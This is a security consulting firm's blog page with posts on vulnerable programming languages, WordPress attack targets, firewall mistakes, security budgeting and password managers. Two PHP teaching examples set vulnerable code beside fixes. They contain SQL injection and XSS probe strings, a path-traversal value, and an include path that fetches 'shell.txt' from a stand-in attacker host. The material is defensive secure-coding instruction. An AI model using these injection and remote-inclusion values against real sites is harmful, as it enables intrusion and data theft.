Blog

5 Common Programming Languages That Cause the Most Software Vulnerabilities

Posted by Nik • Feb. 4, 2016 • 0 Comments

Over the last couple of years, many cybersecurity problems have come to light. There has been a wave of WordPress and Drupal vulnerability warnings and patches, and SQL injection bugs are being found left and right in Web applications. Many of these bugs can be traced back to PHP, but other common programming languages also produce vulnerable applications. Using cloud-based scans and code analysis of more than 50,000 applications over 18 months, Veracode found that applications written in the following five programming languages carry the most software vulnerabilities.


1. PHP

Unlike the .NET and Java frameworks, PHP applies few protections against injection flaws by default, which is partly why it is so hard to program securely in PHP: where those frameworks ship with parameterized data access and HTML output encoding, PHP developers have to reach for the equivalents (PDO prepared statements, htmlspecialchars) deliberately. According to Veracode, 86 percent of applications written in PHP contain at least one cross-site scripting (XSS) vulnerability, while 56 percent contain at least one SQL injection bug. Although SQL injection is one of the most abused vulnerabilities, it is also among the easiest to fix: pass user input to the database as a bound parameter of a prepared statement instead of concatenating it into the query text. Work with a security consultant to keep your PHP applications safe.
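Both findings come down to the same mistake: untrusted input is spliced into a string that another interpreter (the database, the browser) then executes. The following is an added example, not code from the original post or from Veracode, showing the vulnerable pattern and the fix for each in PHP. It uses an in-memory SQLite database through PDO (the pdo_sqlite extension) so it runs offline; the table, its rows and the attacker inputs are constructed for the demonstration.

```php
<?php
// Added example (not from the original post): SQL injection and XSS in PHP,
// each shown as the vulnerable pattern next to its fix.
declare(strict_types=1);

// Constructed in-memory database so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL, role TEXT NOT NULL)');
$db->exec("INSERT INTO users (name, role) VALUES ('alice', 'admin'), ('bob', 'user')");

// VULNERABLE: the search term is concatenated into the SQL text, so a quote in
// the input ends the string literal and whatever follows is parsed as SQL.
function findUserVulnerable(PDO $db, string $name): array
{
    $sql = "SELECT name, role FROM users WHERE name = '$name'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// FIXED: a prepared statement sends the SQL text and the value separately.
// The value is bound as data and cannot change the structure of the query.
function findUserSafe(PDO $db, string $name): array
{
    $stmt = $db->prepare('SELECT name, role FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// VULNERABLE: user-supplied text is echoed into HTML unchanged, so markup and
// <script> elements in it are rendered and executed in the victim's browser.
function greetVulnerable(string $displayName): string
{
    return "<p>Hello, $displayName</p>";
}

// FIXED: encode for the HTML text context at the point of output. ENT_QUOTES
// also encodes single quotes, so the same call is safe inside quoted attribute
// values; the charset argument must match the page's declared encoding.
function greetSafe(string $displayName): string
{
    return '<p>Hello, ' . htmlspecialchars($displayName, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
}

// Constructed attacker inputs: the first turns the WHERE clause into a
// tautology, the second is a classic reflected-XSS probe.
$sqlProbe = "nobody' OR '1'='1";
$xssProbe = '<script>alert(document.cookie)</script>';

printf("vulnerable query: %d row(s)\n", count(findUserVulnerable($db, $sqlProbe)));
printf("prepared query:   %d row(s)\n", count(findUserSafe($db, $sqlProbe)));
echo greetVulnerable($xssProbe), "\n";
echo greetSafe($xssProbe), "\n";
```

Run it with `php` on the command line. The concatenated query returns every row, because the injected `OR '1'='1'` is evaluated as SQL, while the prepared statement looks for a user literally named `nobody' OR '1'='1` and finds none. The same rule applies to the HTML side: the fix is not to filter the input but to encode it for the context where it is output.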


2. Classic ASP

Like PHP, Classic ASP offers little framework-level protection against injection flaws, which attackers exploit to steal data. Veracode found that 64 percent of applications written in Classic ASP contain at least one SQL injection bug.


3. ColdFusion

ColdFusion applications are the next most vulnerable, with 62 percent of them having at least one SQL injection bug. SQL injection is an attack in which text typed into an input field is spliced directly into a database query, so that the attacker's text is executed as SQL commands and gives them access to the backend database.


4. .NET

Typically taught as part of computer science courses, .NET contains built-in security functions. However, 29 percent of .NET applications still contain at least one SQL injection bug. A network security consultant can identify the risk of this kind of bug and implement solutions to lock attackers out.


5. Java

Like .NET, Java is commonly taught in computer science courses and contains built-in security functions. Veracode found that 21 percent of Java apps have at least one SQL injection bug, which means that a significant number of sites are at risk of attack.

Could your Web apps contain security vulnerabilities? No matter what programming language you use, a cybersecurity consulting service can help you identify risks and make your applications safer. Get in touch with Garland Heart to find out how we can help you stay safe.
 
Free eBook. Reduce cybersecurity risk in your financial institution. Download now.

Topics: IT, cybersecurity, Security

WordPress and Health Applications Are Now the Most Popular Web Attack Targets

Posted by Nik • Jan. 19, 2016 • 0 Comments

Research shows that WordPress and health applications are the most popular targets for online attacks. If you’re currently using WordPress for your website or offering a healthcare app, here are some key facts and figures you should know.

 

Content Management Systems Are Most Vulnerable

A new report by Imperva revealed that content management systems (CMSes) like WordPress, Drupal and Joomla were attacked three times more often than other web applications. They’re often targeted by remote command execution (RCE) attacks. Out of the most popular CMSes, WordPress is a particularly favorite mark of hackers.

Attackers break into CMSes through their plug-ins. With more than 30,000 plug-ins, each carrying its own weaknesses, WordPress is especially exposed to this kind of attack. WordPress is also five times more likely than other CMSes to be hit by remote file inclusion (RFI) attacks.

 

Open-Source Frameworks Come With Increased Exposure

Developers in open-source ecosystems are constantly producing new plugins and add-ons, often without a dedicated focus on security. Although this kind of environment is exciting to work in, the fast pace of development increases the number of vulnerabilities in CMS applications, particularly WordPress, which is written in PHP. Attackers can sometimes exploit insecure PHP coding patterns to attack sites built on the WordPress platform.
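The remote file inclusion that the Imperva figures above single out is a PHP-specific coding pattern: a request parameter is passed straight to include or require. Here is an added example, not code from the original post, from WordPress or from Imperva, of a small page router written the vulnerable way and the fixed way. The page names, file paths and hostile inputs are constructed for the demonstration.

```php
<?php
// Added example (not from the original post): remote file inclusion (RFI)
// in a PHP page router, vulnerable and fixed.
declare(strict_types=1);

// VULNERABLE: the request parameter is the include path. With
// allow_url_include=On, ?page=http://attacker.example/shell.txt? makes PHP
// fetch and run remote code (the trailing "?" turns the appended ".php" into a
// query string). Even with URL includes off, "../" in the parameter lets the
// request include any .php file on the server, not just the pages this router
// was meant to serve.
function routeVulnerable(string $page): void
{
    include $page . '.php';
}

// FIXED: the parameter is only ever a key into a fixed allowlist. The filesystem
// path comes from this table, never from the request, so there is nothing for
// an attacker to traverse or point at a remote host.
function allowedPages(): array
{
    return [
        'home'    => __DIR__ . '/pages/home.php',
        'about'   => __DIR__ . '/pages/about.php',
        'contact' => __DIR__ . '/pages/contact.php',
    ];
}

function resolvePage(string $page): ?string
{
    return allowedPages()[$page] ?? null;
}

function routeSafe(string $page): void
{
    $path = resolvePage($page);
    if ($path === null) {
        http_response_code(404);
        echo 'No such page';
        return;
    }
    include $path;
}

// Constructed requests: two legitimate page names and two hostile values.
$requests = [
    'home',
    'http://attacker.example/shell.txt?',
    '../../admin/install',
    'about',
];
foreach ($requests as $page) {
    echo str_pad($page, 40), resolvePage($page) === null ? 'rejected' : 'allowed', "\n";
}
```

The demonstration loop only calls resolvePage, so it runs without the pages directory existing; in a real deployment routeSafe would be wired to the request. Note that the fix does not try to sanitize the parameter (stripping "../" or "http://" is easy to bypass); it refuses to treat the parameter as a path at all.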

 

Healthcare Apps Also a Concern

Many healthcare apps are targeted by cross-site scripting (XSS) attacks, in which hackers try to insert their own scripts into an app or webpage. Fifty-seven percent of attacks against health apps are XSS attacks, with many hackers trying to hijack sessions to steal personally identifiable information. When conducting vulnerability assessments for your healthcare app, remember to consider the possibility of an XSS attack successfully accessing your users’ data.

 

Get Help When You Need It

Although healthcare apps and CMSes present security risks, there are steps you can take to protect yourself. If you use WordPress for your website, for example, ensure your plug-ins come from a verified developer, keep WordPress itself and every plug-in patched, remove plug-ins you no longer use, and be careful about the information you put into your WordPress database. If you need more help to stay safe, contact Garland Heart to find out how our cyber security consulting services can protect you.

Topics: Info Security, IT, cybersecurity, Security, Healthcare

Is There a Generation Gap in Cybersecurity?

Posted by Gaye Connell • Jan. 15, 2016 • 0 Comments

According to a recent survey by Raytheon and the NCSA, young people ages 18 to 26 aren't pursuing careers in cybersecurity. Young women - who make up just 10 percent of the industry's workforce - are even less interested in cybersecurity than their male counterparts, with 52 percent of millennial women saying cybersecurity programs aren't available to them in school. Only half of millennial men and one-third of millennial women understand what cybersecurity jobs even entail.

 

Why Aren't Millennials Drawn to the Industry?

The results of the survey suggest young people simply aren't getting proper information about cybersecurity in college. Meanwhile, a lack of entry-level cybersecurity jobs limits opportunities for recent graduates. It's difficult for a new grad to find a job as a network security specialist when they don't have industry experience, but it's also challenging to earn that experience when entry-level opportunities are so limited. It's a catch-22.

 

Cybersecurity Firms Must be More Welcoming to Entry-Level Individuals

To avoid a generation gap in cyber security consulting, companies must encourage more diversity within their organizations. Offering apprenticeships and internships can help attract young people to the industry, as can free cybersecurity tools and workshops for students. If companies want a pool of fresh talent to draw upon when their current security consultants retire, it's essential they actively offer knowledge, time and support to those who are interested in working in the information security field.

 

Is Your Company Looking to Hire?

Awareness of the cybersecurity generation gap is essential if your company is looking to hire or develop internal talent. Consider providing more advocacy or support for young people in your workplace. If the generation gap in cyber security consulting is allowed to continue, it could reduce the amount of overall talent in the workforce - and drive up the cost of hiring a security consultant or network security specialist with the necessary education and skills.

 

Mentoring the Next Generation

If you're not sure what you can do to address the cybersecurity generation gap and help millennials become more interested in the field, get in touch with Garland Heart. We can provide information about the current state of the industry and put you in touch with a young security consultant looking for an opportunity to shine.


Topics: Info Security, cybersecurity, Corporate

4 Common Mistakes in Firewall Configuration

Posted by Nik • Jan. 13, 2016 • 0 Comments

A firewall is a great way to protect your organization, but it only works well if it is configured properly. Here are four common mistakes in firewall configuration, along with some tips for avoiding them.

 

1. Non-Standard Authentication Methods

Authenticating firewall administrators with a one-off or locally improvised method puts you at risk of a cybersecurity breach. When you don't use a standard method, you rely entirely on the expertise of whoever set up the firewall, or worse, on the device's default settings. A better approach is to tie administrative access to a recognized, centrally managed standard (for example, your existing directory or AAA service, with individual accounts and multi-factor authentication) to give your computer network security a stronger foundation.

Without a single standard authentication method, problems can arise when staff attempt to log in from different devices and locations. For example, a non-standard authentication method could allow weaker passwords or place less-strict limits on the number of login attempts. These security problems create opportunities for attackers to break into your network.

If your company has multiple locations or remote offices, ensure all locations follow the same standard authentication method. This will help to eliminate weak spots in your computer network security.

 

2. Open Policy Configurations

Firewalls that allow traffic from any source to any destination pose a security risk. IT teams often use open policy configurations when they aren't sure what they need, since starting with broad rules makes it easy to tweak firewall configurations later. However, too many IT teams never get around to defining more specific firewall policies, leaving the network exposed to risks.

Your IT team should grant the minimum level of access that users and services need to function normally: start from a deny-all baseline and add explicit rules only for the specific sources, destinations, ports and protocols each application requires. Revisit the policy regularly to see how applications are actually being used, so you can tighten rules that turned out to be broader than necessary.

 

3. Risky Management Services

Leaving unnecessary services running on the firewall compromises security. Common offenders are dynamic routing protocols nobody configured deliberately and a DHCP server left enabled on the firewall, which hands out addresses that conflict with those assigned by the real DHCP server.

Once again, the solution is to follow the principle of least privilege: enable only the services the firewall needs to do its job and disable the rest. Every unnecessary service is another listening port an attacker can probe, and it also costs performance and adds network load.

 

4. Failure to Log Outputs From Security Devices

Logs from security devices are only useful if someone, or something, reads them: forward them to a central log server or SIEM and alert on them, so you learn you are under attack while it is happening rather than afterwards. The same logs are what you investigate a breach with, and reviewing them over time shows where your risk management needs work. Focus on admin accounts, activity outside business hours, remote access and other high-risk areas to spot red flags.

Need help configuring your firewall? Contact Garland Heart today to find out how we can help.


Topics: Info Security, cybersecurity, Security

Your 4-Step Guide to Security Budget Planning for 2016: Part 2

Posted by Gaye Connell • Dec. 28, 2015 • 0 Comments

Once again, it’s time to plan your security budget for the next year. In our last post, we discussed planning and implementing as the first two steps of planning your 2016 security budget. Now, let’s look at the final two steps: execution and analysis.

 

Execution

Successful execution of a security plan involves detecting new risks and monitoring the enforcement of security policies. Is your system configured to enforce the policies you put in place during steps one and two? Ideally, your system should allow you to identify, understand and address any potential threats on a daily basis.

The people in your organization are a great asset in the fight against security risks, but they can also be your biggest risk. Even the most advanced technology and carefully designed security controls rely on some amount of human interpretation and execution. In order to make the most of the time and money you have spent implementing security processes, you need to educate your team so that they are able to manage and maintain the secure environment you have created, both now and as the business grows.

Note that a new application or “automated” process sometimes reduces effort, but often it still requires the same amount of staff time to execute. Make sure you understand the full input needed to get the desired result!

When allocating funds for monitoring security processes, consider the following security concerns: 

  • Unused, generic, default, or shared user profiles
  • Programs that don’t match known updates
  • Suspicious activity on company networks, possibly indicating an intrusion attempt (ex. remote access or administrator/maintenance accounts)

Always look for opportunities to educate your customers and clients and consider whether you need to bring in external audit or security consulting services as your business grows.

 

Feedback and Analysis

Finally, you need to make sure that your security policies are actually working in the way you intended. Comparing the security enforcement that occurs in your organization to that laid out in your security policies is a key stage in IT risk management.

Internal testing and inspecting can help to check how accurately security practices in your organization match those defined in your policy. External audits are also useful, as they can take an objective view of your organization and the people working within it.

If you have an upcoming security audit, you will need to set aside part of your budget to prepare for and conduct the audit, as well as some extra money to respond to the audit findings. Remember to plan this into your 2016 budget so that you aren’t left with a shortfall.

If you are still trying to justify expanding your IT or security budget, think of health or life insurance. As you grow older, or as your business matures, the impact a loss would have on your personal or family life becomes harder to ignore, and adding or increasing that cover becomes worth more than the cost of doing nothing. Our growing reliance on technology makes our lives easier, but it also increases the magnitude of the damage when something goes wrong.

 

If you need to consult a network security specialist to help you execute and evaluate the enforcement of your security policies, get in touch with Garland Heart today. Our expert network security specialist teams can help you to ensure that your organization is following good security practices that can help keep your systems safe.

 

Topics: IT, Security, Legal, Finance, Retail, Corporate

Your 4-Step Guide to Security Budget Planning for 2016: Part 1

Posted by Nik • Dec. 22, 2015 • 0 Comments

You don’t have to be overwhelmed planning your IT risk management for 2016. Simply follow the four steps outlined over these two posts to create your 2016 budget. 

Planning

First, define the security policies and controls that you’ll use to protect your company’s assets. As an example, you might implement the security policy “employees must change their passwords every 60 days” to protect your company. Your policies must meet standards and regulations such as HIPAA, SOX, FFIEC, GLBA, ISO 27001 and NIST.

It’s important to align the environment and culture in your organization with the policies you choose. Educate your teams to make sure they understand your company’s security aims and the methods to keep everyone safe. Understand the expenses that each department faces relating to security and allow for them in your budgeting.

As well as meeting the required standards or regulations for your industry, you also need to understand the standards that your client wants your organization to meet. If clients are required to hold your organization accountable to certain standards, you could face unforeseen expenses. Therefore, it is essential to understand these requirements from the outset.

Ask yourself the following questions about your security plans in 2016 and allocate money accordingly: 

  • Do you have explicit security policies that are formally documented?
  • What industry standards or government regulations do you need to comply with?
  • Have any standards or regulations changed since last year?
  • Do any existing policies need to be changed?
  • Have we as an organization looked at what security or regulatory requirements our clients and/or customers expect us to meet?

 

Implementation

After the initial planning stage, you need to think about how you’ll use your 2016 budget to enforce your security policies. Use the Pareto principle as a rule of thumb: roughly 20 percent of attack types cause 80 percent of the damage, so tackle those threats first.

At Garland Heart, we typically see security budgets of between 4 and 15 percent of a company’s total revenue. With such variation within the industry, there are ways to maintain strong IT risk management while reducing or holding costs in your organization. Many companies find that hiring an external network security specialist is a cost-effective way of managing security risks, as it frees up the time of your internal staff so they can concentrate on their day-to-day responsibilities. Another way to prioritize your implementation dollars is simply to risk-rate the areas of potential loss, fraud, operational impact and/or business impact based on the threats and regulatory obligations your business faces. An analysis of previous unexpected costs and IT/operational efficiencies is also helpful. Security experts like Garland Heart can help you use your existing security products to effectively enforce your policies.

Get in touch with Garland Heart today to find out how we can help you make the most of your 2016 security budget. Check out Part 2 of our 4-Step Guide to Security Budget Planning for 2016 to get more tips.

 

Topics: Security, Legal, Healthcare, Finance, Retail, Corporate

New Study: Cybercrime Costs Organizations $15 Million on Average Per Year

Posted by Gaye Connell • Dec. 21, 2015 • 0 Comments

A 2015 study by HP found that the average cost of cyber crime has grown to $15 million per year, which is an increase of 82 percent over the last six years. In the companies featured in the study, costs ranged between $1.9 million and a massive $65 million per year. With such large potential costs, it is vital to take action to protect your business from all forms of cyber crime.

 

What are the Highest Risk Threats?

The most costly cyber crimes are denial of service attacks and attacks arising from malicious insiders and malicious code. In combination, these three types of cyber attacks account for more than half of all cyber crime costs. The average cost of cyber crime over a 46-day resolution period is more than $1.9 million, which is an increase of 22 percent since last year.

Malicious insider attacks usually take the longest to resolve, which can lead to a large build-up of costs. Information theft accounts for most of the external costs associated with cyber crime, whereas recovery and detection are the most costly internal activities. It is vital to protect your organization against risks posed by malicious agents both inside and outside the organization and to keep your clients’ information safe.

 

How Can Your Company Prepare Against Cyber Crime?

According to the recent HP study, using a security information and event management (SIEM) solution can reduce cyber crime costs by an average of $3.7 million. A comprehensive SIEM solution combines software and services that aid in detecting and responding to security breaches. Skimping on SIEM is likely to backfire, leading to higher cyber crime costs, whereas proper budgeting for security can save an average of $2.8 million on attack management costs. 

In the past, companies were able to get away with piling security responsibilities onto internal staff, but as the complexity of technology increases, staff are no longer able to manage all the security risks faced by a company. As a result, businesses are starting to realize that they need to call in experts to support their internal staff. Not only can a network security specialist provide more comprehensive and reliable security support, but their services also free up internal staff, allowing them to focus on their day-to-day responsibilities within the business.

 

Calling in the Experts to Reduce Cyber Crime Costs

Businesses that employ a cybersecurity consulting service can save as much as $2.1 million on the cost of cyber crime every year. If you want to know how cybersecurity consulting could help reduce cyber crime costs in your organization, get in touch with Garland Heart today for a consultation.

Topics: cybersecurity, Security, Corporate

Merry Christmas

Posted by Brad Garland • Dec. 18, 2015 • 0 Comments

All of us at Garland Heart would like to wish you all a Merry Christmas and would like to thank our clients for their support during this very busy and productive 2015 year.

We will be all taking some time off the week of December 28th to spend time with our friends and family.  Business will reopen on January 4th.   

Here is our annual video and we hope it will put a smile on your face, as well as get you in the mood to finish your Christmas shopping.

6 Secure Password Management Systems for Your Business

Posted by Nik • Dec. 18, 2015 • 0 Comments

Protecting the passwords of all your employees is a key part of IT risk management. Password management systems, in combination with other cybersecurity systems, can help to protect workers from becoming victims of hacking. Here are six of the best secure password management systems for businesses.

Dashlane Premium

Dashlane Premium is available for a wide variety of devices, including iOS and Android mobile devices, as well as desktop PCs and Macs. This password management system stores users’ passwords in an encrypted vault and manages the encryption keys carefully, keeping the passwords secure. It also features a password generator, which you can use to create random and complex passwords for all applications. When an employee changes a shared password, Dashlane Premium automatically syncs the new password to all team members and their devices. It can even issue breach alerts to let you know when you need to change passwords due to a security breach in a service you use. On the security dashboard, you can see weak and reused passwords so you can quickly take action to change them. Dashlane Premium costs $39.99 per year for each user.

 

LastPass Enterprise

Many large companies rely on LastPass Enterprise as part of their IT risk management strategy. Available in 17 languages, this password-management system runs on most platforms. It issues breach alerts to let you know when you should update your passwords, identifies weak and duplicate passwords and also generates compliance reports for your organization. LastPass Enterprise is also cost-effective for large organizations: the standard price is $24 per user per year, but discounts increase with the number of users. You can access a free 14-day trial for up to 10 users to try the software out. Note that although LastPass disclosed a breach in June 2015, the company reported that attackers took account email addresses, password reminders and authentication hashes but no encrypted vault data, so users’ stored passwords were not exposed; LastPass nonetheless advised users to change their master passwords.

 

Team Password Manager

If you’re looking for a self-hosted password system that stays on your own servers, try Team Password Manager. Available for free for up to two users, $99 for five users and $2,999 for unlimited users, Team Password Manager can be cost-effective for both very large and very small organizations. One nice feature of this software is its use of ‘projects,’ which allow teams of users to access the passwords they need for collaboration. It also has a password generator, which can suggest secure passwords based on random letters, numbers and symbols.

 

CommonKey

If you need a password management system for a small team, consider CommonKey. Designed to facilitate shared access to web services, CommonKey is free for up to three users, with a charge of $2 per month for each additional user. It features a password generator, as well as simple user provisioning and de-provisioning.

 

Meldium

Meldium manages passwords for many cloud services, including Google Drive, DropBox, WordPress and Salesforce. Furthermore, it can integrate with Google Authenticator and LogMeIn ID. Meldium costs $24 per month for up to 20 users, $79 per month for up to 100 users and $169 per month for up to 250 users. Account provisioning is only available in the premium version.

 

Zoho Vault

Available as a web application with browser extensions, plus iOS and Android apps, Zoho Vault is free for personal use but comes with a charge of $4 per user per month for the professional version. Administrators get a wide range of features, including the ability to create and manage user groups, restrict access by IP, transfer password ownership and create reports on users. There is also a password generator and the ability to import passwords from other password managers.

To find out more about computer security systems, including password management systems, get in touch with Garland Heart today.

 

Topics: IT, Security, Corporate

Garland Heart obtains the Best Christian Workplace Institute award for the 3rd year in a row!

Posted by Brad Garland • Nov. 13, 2015 • 0 Comments

The importance of our culture and how we work is something that means a great deal to me. As a company, we choose to spend time debating and cultivating our workplace as we grow. We know there will be changes along the way, people who come and go, and different business problems we get to face every year. This is why, three years ago, we began using the Best Christian Workplace Institute’s survey of all our staff to have a measurement of where we are each year. We had all our employees take the survey again this year and are delighted to hear that we obtained the 2016 Best Christian Workplace Institute Award for great places to work. We are proud of this honor and look for ways to get better each time around. No culture is perfect (and ours is certainly not), but leveraging a tool like the BCWI to measure our success has been extremely helpful in creating an open, performance-driven, and dare I say, fun place to work.

“Garland Heart has developed a remarkably flourishing employee culture placing them in the top 10% of product and service organizations in our survey database. Staff communicate how much the leadership cares about its staff and clients. Their employees indicated they feel highly involved in decisions that impact their work. They are a great example of an organization that lives its values.” - Al Lopus, President of BCWI
